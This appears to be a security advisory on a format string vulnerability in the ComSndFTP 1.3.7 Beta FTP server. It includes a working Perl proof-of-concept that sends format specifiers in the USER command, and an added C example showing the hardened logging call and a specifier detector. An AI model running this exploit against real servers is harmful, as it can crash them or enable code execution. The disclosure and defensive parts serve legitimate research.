Release date:
Updated on:
Affected Systems:
ComSndFTP 1.3.7 Beta
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53865
ComSndFTP is a Windows FTP server.
ComSndFTP 1.3.7 Beta contains a format string vulnerability. Remote attackers can exploit it to execute arbitrary code or cause a denial of service (DoS).
<* Source: demonalex
Link: http://www.securityfocus.com/archive/1/523019
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
#!/usr/bin/perl -w
# ComSndFTP Server Remote Format String Overflow Exploit
# Written by demonalex (at) 163 (dot) com
use IO::Socket;
$| = 1;
# Usage: script.pl $host $port
$host = shift || die "$0 \$host \$port\n";
$port = shift || die "$0 \$host \$port\n";
# printf-style conversion specifiers sent as the user name
$edevil = '%s%p%x%d';
print "Launch Attack ...";
$sock1 = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp', Timeout => 30) || die "HOST $host PORT $port is down!\n";
if (defined($sock1)) {
    # Read the server banner
    $sock1->recv($content, 100, 0);
    sleep(2);
    # Send the USER command carrying the format specifiers
    $sock1->send("USER " . $edevil . "\r\n", 0);
    sleep(2);
    $sock1->recv($content, 100, 0);
    sleep(5);
    $sock1->close;
}
print "Finish!\n";
exit(1);
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
ComSndFTP
---------
The vendor has not yet released a patch or an upgrade. Users of the software should watch the vendor's homepage for the latest version:
http://ftp.comsnd.com/
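
Added example (not ComSndFTP code and not part of the original advisory): the bug class described above usually arises when client text, here the USER argument, is passed as the format string of a printf-family call. The C sketch below shows the hardened call next to the vulnerable pattern and a check that flags format specifiers in a USER argument. The function names are hypothetical, and the advisory does not say where in the server the flaw sits, so the logging context is an assumption.

```c
/* Added illustration: not ComSndFTP code. All function names are hypothetical. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Return 1 if s holds a printf conversion (%s, %p, %08x, %n ...); "%%" is ignored. */
int has_format_spec(const char *s)
{
    for (; *s; s++) {
        if (*s != '%' || *++s == '%')
            continue;                         /* plain char or escaped percent */
        while (*s && strchr("-+ #0123456789.*$hlLjzt", *s))
            s++;                              /* flags, width, precision, length */
        if (*s == '\0')
            return 0;                         /* dangling '%' at end of input */
        if (strchr("diouxXeEfFgGaAcspn", *s))
            return 1;
    }
    return 0;
}

/* Build a log line for one FTP command line. Returns -1 if it is not a USER
 * command, 1 if the user name carries format specifiers, 0 otherwise. */
int log_user_command(char *out, size_t outlen, const char *line)
{
    static const char verb[] = "USER ";
    char user[128];
    size_t i, n;
    for (i = 0; i < 5; i++)                   /* FTP verbs are case-insensitive */
        if (toupper((unsigned char)line[i]) != verb[i])
            return -1;
    n = strcspn(line + 5, "\r\n");
    if (n >= sizeof user)
        n = sizeof user - 1;
    memcpy(user, line + 5, n);
    user[n] = '\0';
    /* Vulnerable: snprintf(out, outlen, user). Hardened: user is only a "%s" argument. */
    snprintf(out, outlen, "USER login attempt: %s%s", user,
             has_format_spec(user) ? " [format specifiers]" : "");
    return has_format_spec(user);
}

int main(void)
{
    char buf[256];
    if (log_user_command(buf, sizeof buf, "USER %s%p%x%d\r\n") == 1) /* constructed input */
        puts(buf);
    return 0;
}
```

A return value of 1 is a reasonable trigger for an alert or for rejecting the login attempt before the name reaches any other formatting code.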